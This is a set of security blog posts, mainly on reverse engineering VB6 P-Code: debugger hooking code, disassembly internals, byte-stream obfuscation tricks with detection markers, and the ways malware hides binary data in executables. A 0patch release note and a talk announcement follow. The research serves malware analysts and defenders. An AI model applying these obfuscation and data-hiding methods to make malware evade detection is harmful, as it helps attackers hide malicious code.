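extern void (*g_origTable[256])(void);     /* saved base dispatch table from the hooking sketch */

static void __declspec(naked) Opcode01_Nop(void)
{
    __asm {
        xor  eax, eax
        mov  al, byte ptr [esi]              /* fetch the next opcode byte */
        inc  esi                             /* consume it */
        jmp  dword ptr g_origTable[eax * 4]  /* dispatch as the runtime would */
    }
}

void InstallNop(void **pTable)               /* table already made writable */
{
    /* slot 0x01 is the unused InvalidExCode entry; with this level of access the
       UI can likewise live-patch opcodes or move the P-Code pointer by writing
       the global VM struct remotely */
    pTable[0x01] = (void *)Opcode01_Nop;
}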

As hinted at in the comments, features such as live patching of the current opcode and “Set New Origin Here” are both possible. These are implemented by the debugger making direct WriteProcessMemory calls to the global VM struct. The address of this structure was disclosed in initialization messages at startup.

Conclusion

Writing a P-Code debugger is a very interesting concept. It is something that I personally wanted to do for the better part of 20 years.

Once you see all the moving parts up close it is not quite as daunting as it may seem at first glance.

Having a working P-Code debugger is also a foundational step to learning how the P-Code instruction set really works. Being able to watch VB6 P-code run live with integrated stack diffing and data viewer tools is very instructive. Single stepping at this level of granularity gives you a much clearer, higher level overview of what is going on.

While the hook code itself is technically challenging, there are substantial tasks required up front just to get you into the game.

Prerequisites for this include:

  • accurate parsing of an undocumented file format
  • a solid disassembly engine for an undocumented P-Code instruction set
  • user interface that allows for easy data display and debugger control

For a reverse engineer, a project such as this is like candy. There are so many aspects to analyze and work on. So many undocumented things to explore. A puzzle with a thousand pieces.

What capabilities can be squeezed out of it? How much more is there to discover?

For me it is a pretty fascinating journey that also brings me closer to the language that I love. Hopefully these articles will inspire others and enable them to explore as well.

[1] – VB P-Code Disassembly
[2] – VB6 runtime with symbols (MD5: EEBEB73979D0AD3C74B248EBF1B6E770)
[3] – VB P-code Information by Mr Silver
[4] – ApiLogger – Breaking into Malware
[5] – IDA JScript
[6] – SysAnalyzer ApiLogger – freeze remote process


VB6 P-Code Disassembly

5 May 2021 at 05:48

In this article we are going to discuss the inner depths of VB6 P-Code disassembly and the VB6 runtime.

As a malware analyst, I have always found VB6 in general, and P-Code in particular, to be a problem area. It is not well documented and the publicly available tooling did not give me the clarity I really desired.

In several places throughout this paper there may be VB runtime offsets presented. All offsets are to a reference copy with md5: EEBEB73979D0AD3C74B248EBF1B6E770 [1]. Microsoft has been kind enough to provide debug symbols with this version for the .ENGINE P-Code handlers.

To really delve into this topic we are going to have to cover several areas.

The general layout will cover:

  • how the runtime executes a P-Code stream
  • how P-Code handlers are written
  • primer on the P-Code instruction set
  • instruction groupings
  • internal runtime conventions
  • how to debug handlers

Native Opcode Handlers & Code Flow

Let’s start with how a runtime handler interprets the P-Code stream.

In future articles we will detail how the transition is made from native code to P-Code. For our purposes here, we will look at individual opcode handlers once P-Code interpretation has already begun.

For our first example, consider the following P-Code disassembly:

Here we can see two byte codes at virtual address 0x401932. These have been decoded to the instruction LitI2_Byte 255. 0xF4 is the opcode byte. 0xFF is the hardcoded argument passed in the byte stream. 

The opcode handler for this instruction is the following:

While in a handler, the ESI register will always start as the virtual address of the next byte to interpret. In the case above, it would be 0x401933 since the 0xF4 byte has already been processed to get us into this handler.

The first instruction at 0x66105CAB will load a single byte from the P-Code byte stream into the EAX register. This value is then pushed onto the stack. This is the functional operation of this opcode.

EAX is then cleared and the next value from the byte stream is loaded into the lower part of EAX (AL). This will be the opcode byte that takes us to the next native handler.

The byte stream pointer is then incremented by two. This will set ESI past the one byte argument, and past the next opcode which has already been consumed.

Finally, the jmp instruction will transfer execution to the next handler by using the opcode as an array index into a function pointer table.

Now that last sentence is a bit of a mouthful, so let's include an example. Below are the first few entries from the _tblByteDisp table. This table is an array of 4 byte function pointers.

Each opcode is an index into this table. The *4 in the jump statement is because each function pointer is 4 bytes (32 bit code).
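
To make the flow concrete, here is a small C model of what the hand-written assembly does; it is only a model, since the real runtime threads execution with a jmp from handler to handler and never returns to a central loop.

#include <stdint.h>

typedef void (*HANDLER)(uint8_t **pc);
extern HANDLER tblByteDisp[256];          /* the base function pointer table */

static void push_i2(int v) { (void)v; }   /* stand-in for pushing onto the VB stack */

/* model of the LitI2_Byte handler: the 0xF4 opcode has already been consumed on entry */
void LitI2_Byte(uint8_t **pc)
{
    uint8_t arg = (*pc)[0];               /* the hardcoded byte argument (0xFF above) */
    push_i2(arg);                         /* functional operation: push the literal */

    uint8_t opcode = (*pc)[1];            /* the next opcode byte */
    *pc += 2;                             /* skip the argument and the consumed opcode */
    tblByteDisp[opcode](pc);              /* equivalent of jmp [tbl + opcode*4] */
}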

The only way we know the names of each of these P-Code instructions is because Microsoft included the handler names in the debug symbols for a precious few versions of the runtime. 

The snippet above also reveals several characteristics of the opcode layout to be aware of. First, note that there are invalid slots such as opcode 0x01 - InvalidExCode. The reason for this is unknown, but it also means we can have some fun with the runtime, such as introducing our own opcodes [5].

The second thing to notice is that multiple opcodes can point to the same handler, as is the case with lblEX_Bos. Here we see that opcode 0 leads to the same place as opcode 2. There are actually 5 opcode sequences which point to the BoS (Beginning of Statement) handler.

The next thing to notice is that the opcode names are abbreviated and will require some deciphering to learn how to read them. 

Finally, from the LitI2_Byte handler we already analyzed, we can recognize that all of the stubs were hand-written in assembler.

From here, the next question is how many handlers are there. If each opcode is a single byte, there can only be a maximum of 256 handlers, right? That would make sense, but is incorrect.

If we look at the last 5 entries in the _tblByteDisp table we find this:

The handler for each of these looks similar to the following:

Here we see EAX zeroed out, the next opcode byte loaded into AL and the byte code pointer (ESI) incremented. Finally it uses that new opcode to jump into an entirely different function pointer table.

This would give us a maximum opcode count of (6*256)-5 or 1531 opcodes.

Now luckily, not all of these opcodes are defined. Remember some slots are invalid, and some are duplicate entries. If we go through and eliminate the noise, we are left with around 822 unique handlers. Still nothing to sneeze at.

So what the above tells us is that not all instructions can be represented as a single opcode. Many instructions will be prefixed with a lead byte that then makes the actual opcode reference a different function pointer table.

Here is a clip from the second tblDispatch pointer table:

To reach lblEX_ImpUI1 we would need to encode 0xFB as the lead byte and 0x01 as the opcode byte.

This would first send execution into the _lblBEX_Lead0 handler, which then loads the 0x01 opcode and uses tblDispatch table to execute lblEX_ImpUI1.

A little bit confusing, but once you see it in action it becomes quite clear. You can watch it run live for yourself by loading a P-Code executable into a native debugger and setting a breakpoint on the lead* handlers.

Byte stream argument length  

Before we can disassemble a byte stream, we also need to know how many byte code arguments each and every instruction takes. With 822 instructions this can be a big job! Luckily other reversers have already done much of the work for us. The first place I saw this table published was from Mr Silver and Mr Snow in the WKTVBDE help file.

A codified version of this can be found in the Semi-VbDecompiler source [2], which I have used as a reference implementation. The opcode sizes in this table are largely correct; however, some errors are still present. As with any reversing task, refinement is a process of trial and error.

Some instructions, 18 known to date, have variable length byte stream arguments. The actual size of the byte stream to consume before the next opcode is embedded as the two bytes after the opcode. An example of this is the FFreeVar instruction.

In this example we see the first two bytes decode as 0x0008 (little endian format), which here represents 4 stack variables to free.

Opcode Naming Conventions

Before we continue on to opcode arguments, I will give a brief word on naming conventions and opcode groupings.

In the opcode names you will often see a combination of the following abbreviations. The below is my current interpretation of the less intuitive specifiers:

Opcode abbreviation Description
Imp Import
Ad Address
St / Ld Store / Load
I2 Integer/Boolean
I4 Long
UI1 Byte
Lit Literal (i.e. “Hi”, 2, 8)
Cy Currency
R4 Single
R8 Double
Str String
Fn Calls a VBA export function
FPR Floating point register
PR Uses ebp-4C as a general register
Var Variant
Rf Reference
VCall VTable call
LateID Late bound COM object call by method ID
LateNamed Late bound COM Object call by method name

Specifiers are often combined to denote meaning and opcodes often come in groups such as the following:

An opcode search interface such as this is very handy while learning the VB6 instruction set.

Opcode Groups

The following shows an example grouping:

Opcode abbreviation Description
ForUI1 Start For loop with byte as counter type
ForI2 With integer counter, default step = 1
ForI4 Long type as counter
ForR4
ForR8
ForCy
ForVar
ForStepUI1 For loop with byte counter, user specified step
ForStepI2
ForStepI4
ForStepR4
ForStepR8
ForStepCy
ForStepVar
ForEachCollVar For each loop over collection using variant
ForEachAryVar For each loop over array using variant
ForEachCollObj For each loop over collection using object type
ForEachCollAd
ForEachVar
ForEachVarFree

A two part series on the intricacies of how For loops were implemented is available [3] for the curious.

As you can see, the opcode set can collapse down fairly well once you take into account the various groupings. While I have grouped the instructions in the source, I do not have an exact number as the lines between them can still be a bit fuzzy. It is probably around 100 distinct operations once grouped.

Now, on to the task of argument decoding. I am not sure why, but most P-Code tools only show you the lead byte, opcode byte, and mnemonic. Resolved arguments are only displayed if the opcode is fully handled.

Everything except Semi-VBDecompiler [6] skips the display of the argument bytes.

The problem arises from the fact that no tool yet decodes all of the arguments correctly for all of the opcodes. If you do not see the argument byte stream, there is no indication other than a subtle jump in virtual address that anything has been hidden from you.

Consider the following displays:

The first version shows you opcode and mnemonic only. You don’t even realize anything is missing. The second version gives you a bigger hint and at least shows you no argument resolution is occurring. The third version decodes the byte stream arguments, and resolves the function call to a usable name.

Obviously the third version is the gold standard we should expect from a disassembler. The second version can be acceptable and shows something is missing. The first version leaves you clueless. If you are not already intimately familiar with the instruction set, you will never know you are missing anything.

Common opcode argument types

In the Semi-VbDecompiler source many opcodes are handled with custom printf type specifiers [4]. Common specifiers include:

Format specifier Description
%a Local argument
%l Jump location
%c Proc / global var address stored in constant pool
%e Pool index as P-Code proc to call
%x Pool index to locate external API call
%s Pool index of string address
%1/2/4 Literal byte, int, or long value
%t Code object from its base offset
%v VTable call
%} End of procedure

Many opcodes only take one or more simple arguments, %a and %s being the most common.

Consider "LitVarStr %a %s" which loads a variant with a literal BSTR string, and then pushes that address to the top of the stack:

The %a decoder will read the first two bytes from the stream and decode it as follows:

Interpreting 0xFF68 as a signed 2 byte number is -0x98. Since it is a negative value, it is a local function variable at ebp-0x98. Positive values denote function arguments. 

Next, the %s handler will read the next two bytes, which it interprets as a pool index. The value at pool index 0 is the constant 0x40122C. This address contains an embedded BSTR, where the address points to the unicode part of the string and the preceding 4 bytes denote its length.

A closer look at run time data for this instruction is included in the debugging section later on.
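
A hedged sketch of those two decoders in C (the output formatting and the surrounding disassembler plumbing are assumptions of mine):

#include <stdint.h>
#include <stdio.h>

/* %a: a signed 16-bit stack offset; negative means a local, positive an argument */
void decode_a(const uint8_t *args, char *out, size_t outlen)
{
    int16_t off = (int16_t)(args[0] | (args[1] << 8));   /* little endian */
    if (off < 0)
        snprintf(out, outlen, "var_%X", -off);           /* 0xFF68 -> -0x98 -> ebp-0x98 */
    else
        snprintf(out, outlen, "arg_%X", off);
}

/* %s: a 16-bit constant pool index whose entry is the address of an embedded BSTR */
uint32_t decode_s(const uint8_t *args, const uint32_t *constPool)
{
    uint16_t idx = (uint16_t)(args[0] | (args[1] << 8));
    return constPool[idx];                               /* index 0 -> 0x40122C above */
}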

Another common specifier is the %l handler used for jump calculations. It  can be seen in the following examples:

In the first unconditional jump the byte stream argument is 0x002C. Jump locations are all referenced from the function start address, not the current instruction address as may be expected. 

0x4014E4 + 0x2C = 0x401510 
0x4014E4 + 0x3A = 0x40151E

Since all jumps are calculated from the beginning of a function, the offsets in the byte stream must be interpreted as unsigned values. Jumps to addresses before the function start are not possible and represent a disassembly error. 
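
The corresponding %l resolution is then just an unsigned add from the function start; a minimal sketch:

#include <stdint.h>

/* %l: a 16-bit unsigned offset from the start of the current function */
uint32_t decode_l(const uint8_t *args, uint32_t funcStartVA)
{
    uint16_t off = (uint16_t)(args[0] | (args[1] << 8));
    return funcStartVA + off;        /* e.g. 0x4014E4 + 0x2C = 0x401510 */
}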

Next let's consider the %x handler as we revisit the "ImpAdCallFPR4 %x" instruction:

The native handler for this is:

Looking at the P-Code disassembly we can see the byte stream of 24001000 is actually two integer values. The first 0x0024 is a constant pool index, and the second 0x0010 is the expected stack adjustment to verify after the call. 
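
As a sketch, resolving those two values from the byte stream and the constant pool might look like this (the structure and names are mine):

#include <stdint.h>

typedef struct {
    uint16_t poolIndex;     /* 0x0024: constant pool slot holding the native call stub */
    uint16_t stackAdjust;   /* 0x0010: expected stack delta verified after the call */
} ImpAdCallArgs;

/* returns the call stub address, e.g. pool slot 0x24 -> 0x4011CE in the example */
uint32_t decode_x(const uint8_t *args, const uint32_t *constPool, ImpAdCallArgs *out)
{
    out->poolIndex   = (uint16_t)(args[0] | (args[1] << 8));
    out->stackAdjust = (uint16_t)(args[2] | (args[3] << 8));
    return constPool[out->poolIndex];
}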

Now we haven't yet talked about the constant pool or the housekeeping area of the stack that VB6 reserves for state storage. For an abbreviated description, at runtime VB uses the area between ebp and ebp-94h as a kind of scratch pad. The meanings of all of these fields are not yet fully known; however, several of the key entries are as follows:

Stack position Description
ebp-58 Current function start address
ebp-54 Constant pool
ebp-50 Current function raw address (RTMI structure)
ebp-4C PR (Pointer Register) used for Object references

In the above disassembly we can see entry 0x24 from the constant pool would be loaded.

A constant pool viewer is a very instructive tool to help decipher these argument byte codes.

It has been found that smart decoding routines can reliably decipher constant pool data independent of analysis of the actual disassembly.

One such implementation is shown below:

If we look at entry 0x0024 we see it holds the value 0x4011CE. If we look at this  address in IDA we find the following native disassembly:

0x40110C is the IAT address of msvbvm60.rtcImmediateIf import. This opcode is how VB runtime imports are called. 

While beyond the scope of this paper, it is of interest to note that VB6 embeds a series of small native stubs in P-Code executables to splice together the native and P-Code execution. This is done for API calls, callbacks, inter-modular calls, etc.

The Constant Pool

The constant pool itself is worth a bit of discussion. Each compilation unit, such as a module, class, or form, gets its own constant pool which is shared by all of the functions in that file.

Pool entries are built up on demand as the file is processed by the compiler from top to bottom. 

The constant pool can contain several types of entries such as: 

  • string values (BSTRs specifically) 
  • VB method native call stubs 
  • API import native call stubs 
  • COM GUIDs 
  • COM CLSID / IID pairs held in COMDEF structures 
  • CodeObject base offsets
  • blank slots which represent internal COM objects filled out at startup by the runtime (ex: App.)

More advanced opcode processors

More complex argument resolutions require a series of opcode post processors.  In the disassembly engine I am working on there are currently 13 post processors which handle around 30 more involved opcodes.

Things start to get much more complex when we deal with COM object calls. Here we have to resolve the COM class ID, interface ID, and discern its complete VTable layout to determine which method is going to be called. This requires access to the COM object's type library if it's an external type, and the ability to recreate its function prototype from that information.

For internal types such as user classes, forms and user controls, we also need to understand their VTable layout. For internal types however we do not receive the aid of tlb files. Public methods will have their names embedded in the VB file format structures which can be of help.

Resolution of these types of calls is beyond the scope of what we can cover in an introductory paper, but it is absolutely critical to get right if you are writing a disassembler that people are going to rely upon for business needs.

More on opcode handler inputs

Back to opcode arguments. It is also important to understand that opcodes can take dynamic runtime stack arguments in addition to the hard coded byte stream arguments. This is not something that a disassembler necessarily needs to understand though. This level of knowledge is mainly required to write P-Code assembly or a P-Code decompiler. 

Some special cases however do require the context of the previous disassembly in order to resolve properly. Consider the following multistep operation:

Here the LateIdLdVar resolver needs to know which object is being accessed. Scanning back and locating the VCallAd instruction is required to find the active object stored in PR.

Debugging handlers

When trying to figure out complex opcode handlers, it is often helpful to watch the code run live in a debugger. There are numerous techniques available here. Watching the handler itself run requires a native debugger. 

Typically you will figure out how to generate the opcode with some VB6 source which you compile. You then put the executable in the same directory as your reference copy of the vb runtime and start debugging. 

Some handlers are best viewed in a native debugger, however many can be figured out just by watching it run through a P-Code debugger. 

A P-Code debugger simplifies operations showing you its execution at a higher level. In one step of the debugger you can watch multiple stack arguments disappear, and the stack diff light up with changes to other portions. Higher level tools also allow you to view complex data types on the stack as well as examine TLS memory and keep annotated offsets. 

In some scenarios you may actually find yourself running both a P-Code debugger and a native debugger on the target process at the same time. 

One important thing to keep in mind is that VB6 makes heavy use of COM types. 

Going back to our LitVarStr example:

You would see the following after it executes:

0019FC28 ebp-120 0x0019FCB0 ; ebp-98 - top of stack 
... 
0019FCB0 ebp-98 0x00000008 
0019FCB4 ebp-94 0x00000000  
0019FCB8 ebp-90 0x0040122C

A data viewer would reveal the following when decoding ebp-98 as a variant:

Variant 19FCB0 
VT: 0x8( Bstr ) 
Res1: 0 
Res2: 0 
Res3: 0 
Data: 40122C 
String len: 9 -> never hit

Debugging VB6 apps is a whole other ball of wax. I mention it here only in passing to give you a brief introduction to what may be required when deciphering what opcodes are doing. In particular, recognizing Variants and SafeArrays in stack data will serve you well when doing VB6 reversing.

Conclusion

In this paper we have laid the necessary ground work in order to understand the basics of a VB6 P-Code disassembly engine. The Semi-VbDecompiler source is a good starting point to understand its inner workings. 

We have briefly discussed how to find and read native opcode handlers along with some of the conventions necessary for understanding them. We introduced you to how opcodes flow from one to the next, along with how to determine the number of byte stream arguments each one takes, and how to figure out what they represent. 

There is still much work to be done in terms of documenting the instruction set. I have started a project where I catalog:

  • VB6 source code required to generate an opcode
  • byte stream arguments size and meaning
  • stack arguments consumed
  • function outputs

Unfortunately it is still vastly incomplete. This level of documentation is foundational and quite necessary for writing any P-Code analysis tools.

Still to be discussed is how to find the actual P-Code function blobs within a VB6 compiled executable. This is actually a very involved task that requires understanding a series of complex and nested file structures. Again, the Semi-VbDecompiler source can guide you through this maze.

While VB6 is an old technology, it is still commonly used for malware. This research is aimed at reducing gaps in understanding around it and is also quite interesting from a language design standpoint. 

[1] – VB6 runtime with symbols
[2] – Semi-VbDecompiler opcode table Source
[3] – A closer look at the VB6 For Loop implementation
[4] – Semi-VBDecompiler opcode argument decodings 
[5] – Introducing a one byte NOP opcode
[6] – Semi-VBDecompiler


VB6 P-Code Obfuscation

28 April 2021 at 09:37

Code obfuscation is one of the cornerstones of malware. The harder code is to analyze the longer attackers can fly below the radar and hide the full capabilities of their creations.

Code obfuscation techniques are very old and take many forms, from source code modifications, opcode manipulations, and packer layers to virtual machines and more.

Obfuscations are common amongst native code, script languages, .NET IL, and Java byte code.

As a defender, it’s important to be able to recognize these types of tricks, and have tools that are capable of dealing with them. Understanding the capabilities of the medium is paramount to determine what is junk, what is code, and what may simply be a tool error in data display. 

On the attacker's side, in order to develop a code obfuscation there are certain prerequisites. The attacker needs tooling and documentation that allows them to craft and debug the complex code flow.

For binary implementations such as native code or IL, this would involve specs of the target file format, documentation on the opcode instruction set, disassemblers, assemblers, and a capable debugger.

One of the code formats that has not seen common obfuscation has been the Visual Basic 6 P-Code byte streams. This is a proprietary opcode set, in a complex file format, with limited tooling available to work with it. 

In the course of exploring this instruction set certain questions arose:

  • Can VB6 P-Code be obfuscated at the byte stream layer?
  • Has this occurred in samples in the wild?
  • What would this look like?
  • Do we have tooling capable of handling it?

Background

Before we continue, we will briefly discuss the VB6 P-Code format and the tools available for working with it.

VB6 P-Code is a proprietary, variable length, binary instruction set that is interpreted by the VB6 Virtual Machine (msvbvm60.dll).

In terms of documentation, Microsoft has never published details of the VB6 file format or opcode instruction set. The opcode handler names were gathered by reversers from the debug symbols leaked with only a handful of runtimes. 

At one time there was a reversing community,  vb-decompiler.theautomaters.com, which was dedicated to the VB6 file format and P-Code instruction set. Mirrors of this message board are still available today [1]. 

On the topic of tooling the main disassemblers are p32Disasm, VB-Decompiler, Semi-Vbdecompiler and the WKTVBDE P-Code debugger.

Of these only Semi-Vbdecompiler shows you the full argument byte stream, the rest display only the opcode byte. While several private P-Code debuggers exist, WKTVBDE is the only public tool with debugging capabilities at the P-Code level. 

In terms of opcode meanings, this is still widely undocumented at this point. Beyond intuition from their names, you would really have to compile your own programs from source, disassemble them, disassemble the opcode handlers, and debug both the native runtime and P-Code to get a firm grasp of what's going on.

As you can glimpse, there is a great deal of information required to make sense of P-Code disassembly and it is still a pretty dark art for most reversers. 

Do VB6 obfuscators exist?

While doing research for this series of blog posts we started with an initial sample set of 25,000 P-Code binaries which we analyzed using various metrics. 

Common tricks VB6 malware uses to obfuscate their intent include:

  • junk code insertion at source level
  • inclusion of large bodies of open source code to bulk up binary
  • randomized internal object and method names 
    • most commonly done at the pre-compilation stage
    • some tools work post compilation.
  • all manner of encoded strings and data hiding
  • native code blobs launched with various tricks such as CallWindowProc

To date, we have not yet documented P-Code level manipulations in the wild. 

Due to the complexity of the vector, P-Code obfuscations could have easily gone undetected to date, which made it an interesting area to research. Hunting for samples will continue.

Can VB P-Code even be obfuscated and what would that look like?

In the course of research, this was a natural question to arise. We also wanted to make sure we had tooling which could handle it.

Consider the following VB6 source:

The default P-Code compilation is as follows:

An obfuscated sample may look like the following:

From the above we see multiple opcode obfuscation tricks commonly seen in native code.

It has been verified that this code runs fine and does not cause any problems with the runtime. This mutated file has been made available on Virustotal in order for vendors to test the capabilities of their tooling [2]. 

To single out some of the tricks:

Jump over junk:

 Jumping into argument bytes:

At runtime what executes is:

Do nothing sequences:

 Invalid sequences which may trigger fatal errors in disassembly tools:

Detection

The easiest markers of P-Code obfuscation are:

  • jumps into the middle of other instructions
  • unmatched for/next opcode counts
  • invalid/undefined opcodes
  • unnatural opcode sequences not produced by the compiler
  • errors in argument resolution from randomized data

Some junk sequences such as Not Not can show up normally depending on how a routine was coded.

This level of detection will require a competent, error-free, disassembly engine that is aware of the full structures within the VB6 file format. 

Conclusion

Code obfuscation is a fact of life for malware analysts. The more common and well documented the file format, the more likely obfuscation tools are to be widespread in the wild.

This reasoning is likely why complex formats such as .NET and Java had many public obfuscators early on.

This research proves that VB6 P-Code obfuscation is equally possible and gives us the opportunity to make sure our tools are capable of handling it before being required in a time constrained incident response. 

The techniques explored here also grant us the insight to hunt for advanced threats which may have already been using this technique and flown under the radar for years.

We encourage researchers to examine the mutated sample [2] and make sure that their frameworks can handle it without error.

References

[1] vb-decompiler.theautomaters.com mirror
http://sandsprite.com/vb-reversing/vb-decompiler/

[2] Mutated P-Code sample SHA256 and VirusTotal link
a109303d938c0dc6caa8cd8202e93dc73a7ca0ea6d4f3143d0e851cd39811261


Binary Data Hiding in VB6 Executables

22 April 2021 at 12:47

Overview

This is part one in a series of posts that focus on understanding Visual Basic 6.0 (VB6) code, and the tactics and techniques both malware authors and researchers use around it. 

Abstract 

This document is a running tally covering many of the various ways VB6 malware can embed binary data within an executable. 

There are 4 main categories: 

  • string based encodings 
  • data hidden within the actual opcodes of the program 
  • data hidden within parts of the VB6 file format  
  • data in or around normal PE structures 

Originally I was only going to cover data hidden within the file format itself, but for the sake of documentation I decided it was worth covering them all.

Data held within the file format is a special case which I find the most interesting. This is because it can be interspersed within a complex set of undocumented structures which would require  advanced knowledge and intricate parsing to detect. In this scenario it would be hard to determine where the data is coming from or to even recognize that these buffers exist.  

Resource Data 

The first technique is the standard one built into the language itself, namely loading data from the resource section. VB6 comes with an add-in that allows users to add a .RES file to the project. This file gets compiled into the resource section of the executable and allows binary data to be easily loaded.

This is a well known and standard technique. 

Appended Data 

This technique is very old and has been used from all manner of programming languages. It is mentioned here for thoroughness and to link to a public implementation [1] that allows for simplified use.

Hex String Buffers 

It is very common for malware to build up a string of hex characters that are later converted back to binary data. Conversion commonly includes various text manipulations such as decryption or  stripping junk character sequences. Extra character sequences are commonly used to prevent  automatic recognition of the data as a hex string by AV.  

In the context of VB6, there are several limitations. The IDE only allows for a total of 1023  characters to be on a single line. VB’s line continuation syntax of &_ is also limited to only 25  lines. For these reasons you will often see large blocks of data embedded in the following format: 

In a compiled binary each string fragment is held as an individual chunk which is easily  identifiable. A faster variant may hold each element in a string array so conglomeration only  occurs once.  

This is a well known and standard technique. It is commonly found in VBA, VB6 and malware  written in many other languages. Line length limitations can not be bypassed through command  line compilation. 

Binary Data Within Images 

There are multiple ways to embed lossless data into image formats. The most common will be to  embed the data directly within the structure of a BITMAP image. Bitmaps can be held directly  within VB6 Image and Picture controls. Data embedded in this manner will be held in the .FRX  form resource file before compilation. Once compiled it will be held in a binary property field for  the target form element. Images created like this can be generated with a special tool, and then  embedded directly into the form using the IDE. 

The following is a public sample[2] of data being extracted from such a bitmap 

Extracted images will display as a series of colored blocks and pixels of various colors. Note that this is not steganography.

Many tools understand how to extract embedded images from binary files. Since the image data  still contains the BITMAP header, parsing of the VB6 file format itself is not necessary. This  technique is public and in common use. The data is often decrypted after it is extracted. 

Chr Strings 

Similar to obfuscations found in C malware, strings can be built up at runtime based on individual  byte values. A common example may look like the following: 

At the asm level, this serves to break up each byte value and put it inline with a bunch of opcodes, preventing automatic detection or display with strings. For native VB6 code it will look like the following:

In P-Code it will look like the following: 

This is a well known and standard technique. It is commonly found in VBA as well as VB6  malware. 

Numeric Arrays 

Numeric arrays are a fairly standard technique in malware that are used to break up the binary  data amongst the programs opcodes. This is similar to the Chr technique but can hold data in a  more compact format. The most common data types used for this technique are 4 byte longs, and 8 byte currency types. The main advantage of this technique is that the data can be easily  manipulated with math to decrypt it on the fly. 

Native: 

P-Code: 

Native: 

P-Code: 

This technique is not as popular as the others, but does have a long history of use. I think the first place I saw it was in Flash ActionScript exploits. 

Form Properties 

Forms and embedded GUI elements can contain compiled-in data as part of their properties. The most common attributes used are Form.Caption, Textbox.Text, and any element's .Tag property.

Since all of these properties are typically entered via the IDE, they are usually found to contain  ASCII only data that is later decoded to binary. 

Developers can however embed binary data directly into these properties using several  techniques.  

While there is a way to hexedit raw data in the .FRX form resource file, this comes with limitations such as not being able to handle embedded nulls. Another solution is inserting the data post compilation. With this technique a large buffer is reserved consisting of ASCII text that has start and end markers. An embedding tool can then be run on the compiled executable to fill in the buffer with true binary data.

Using form element properties to house text based data is a common practice and has been seen  in VBA, VB6, and even PDF scripts. Binary data embedded with a post processing step has been observed in the wild. In both P-Code and Native, access to these properties will be through COM object VTable calls.  

From the Semi-VBDecompiler source, each different control type (including ActiveX) has its own parser for these compiled-in property fields. Results will vary based on the tool used and whether it can display the data. Semi-Vbdecompiler has an option to dump property blobs to disk for manual exploration. This may be required to reveal this type of embedded binary data.

UserControl Properties 

A special case for the above technique occurs with the built in UserControl type. This control is  used for hosting reusable visual elements and in OCX creation. The control has two events which  are passed a PropertyBag object of its internal binary settings. This binary data can be easily set  in the IDE through property pages. This mechanism can be used to store any kind of binary data  including entire file systems. A public example of this technique is available[3]. Embedded data will be held per instance of the UserControl in its properties on the host form. 

Binary Strings 

Compiled VB6 executables store internal strings with a length prefix. Similar to the form properties trick, these entries can be modified post compilation to contain arbitrary binary data. In order to discern these data blobs from other binary data, in depth understanding and complex  parsing of the VB6 file format would have to occur.  

The longest string that can be embedded with this technique is limited by the line length in the  IDE which is 2042 bytes ((1023 bytes – 2 for quotes) *2 for unicode).

VB6 malware can access these strings normally with no special loading procedure. As far as it is concerned, the source was simply str = “binary data”.

The IDE can handle a number of unicode characters which can be embedded in the source for compilation. Full binary data can be embedded using a post processing technique. 

Error Line Numbers 

VB6 allows for developers to embed line numbers that can be accessed in the event of an error to  help determine its location. This error line number information is stored in a separate table outside of the byte code stream.  

The error line number can be accessed through the Erl() function. VB6 is limited to 0xFFFF line  numbers per function, and line number values must be in the 0-0xFFFF range. Since the size of  the embedded data is limited with this technique, short strings such as passwords and web  addresses are the most likely use.

When the code below is run, it will output the message “secret”.

Advanced knowledge of the VB6 file format would be required in order to discern this data from  other parts of the file. Embedded data is sequential and readable if not encoded in some other  way. 

Function Bodies 

The AddressOf operator allows VB6 easy runtime access to the address of a public function in  a module. It is possible to include a dummy function that is filled with just placeholder instructions to create a blank buffer within the .text section of the executable. This buffer can be easily loaded  into a byte array with a CopyMemory call. A simple post compilation embedding could be used to  fill in the arbitrary data.

For P-Code compiles, AddressOf returns the offset of a loader stub with a structure offset. P-Code compiles would require several extra steps but would still be possible.  

References 

[1] Embedded files appended to executable – theTrik:
https://github.com/thetrik/CEmbeddedFiles 

[2] Embedding binary data in Bitmap images – theTrik: 
http://www.vbforums.com/showthread.php?885395-RESOLVED-Store-binary-data-in-UserControl&p=5466661&viewfull=1#post5466661 

[3] UserControl binary data embedding – theTrik:
https://github.com/thetrik/ctlBinData


0patch Agent 21.05.05.10500 released

12 July 2021 at 16:20


 

Today we released a new version of 0patch Agent that fixes some issues reported by users or detected internally by our team. We always recommend keeping 0patch Agent updated to the latest version, as we only support the last couple of versions; not updating for a long time could lead to new patches no longer being downloaded and the agent not being able to sync to the server properly. 

Enterprise users can update their agents centrally via 0patch Central; if their policies mandate automatic updating for individual groups, agents in such groups will get updated automatically.

Non-enterprise users will have to update 0patch Agents manually by logging in to computers with 0patch Agent and pressing "GET LATEST VERSION" in 0patch Console. We're still offering a free upgrade to Enterprise so any PRO user can request Enterprise features by contacting [email protected].

The latest 0patch Agent is always downloadable from https://dist.0patch.com/download/latestagent.


Release Notes


  • "Hash caching" was introduced to significantly reduce the amount of CPU and disk I/O operations when calculating cryptographic hashes of executable modules as these are loaded in running processes. Before, hash calculation was causing performance problems for some users on Citrix and Terminal Servers.
  • Huge log files are a thing of the past. We have implemented a mechanism to keep log sizes limited, with these limits configurable via registry.
  • 0patch Agent used to have the default Windows API behavior when it comes to using SSL/TLS versions, which was causing problems for users requiring TLS 1.1 or 1.2 on older Windows systems and required manual configuration. The new agent supports TLS 1.1 and 1.2 even on older systems such as Windows 7 or  Server 2008 R2 by default.
  • 0patch Console no longer crashes if launched while another instance of 0patch Console is already running. Now, launching a second 0patch Console puts the already running console in the foreground.
  • 0patch Console's registration form had "SIGN UP FOR A FREE ACCOUNT" and "FORGOT PASSWORD" links swapped. This has been corrected.
  • With 0patch FREE, some notifications occasionally failed to get closed and were left hovering indefinitely, making it impossible for users to reach the screen area behind them. This has been corrected.

 

An enormous THANK YOU to all users who have been reporting technical issues to our support team, some of you investing a lot of time in investigating problems and searching for solutions or workarounds. You helped us make our product better for everyone!

WARNING: We have users reporting that various anti-virus products seem to detect the new agent as malicious and block its installation or execution. Specifically, Kaspersky detects the MSI installer package as malicious (preventing installation and update), while Avast and AVG detect 0patchServicex64.exe as malicious (preventing proper functioning of the agent). We recommend marking these as false positives, restoring quarantined files and making an exception for these files if affected.


 

 

 

My talks @ BlackHat 2021 and DefCon29

3 July 2021 at 20:59
By: pi3

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

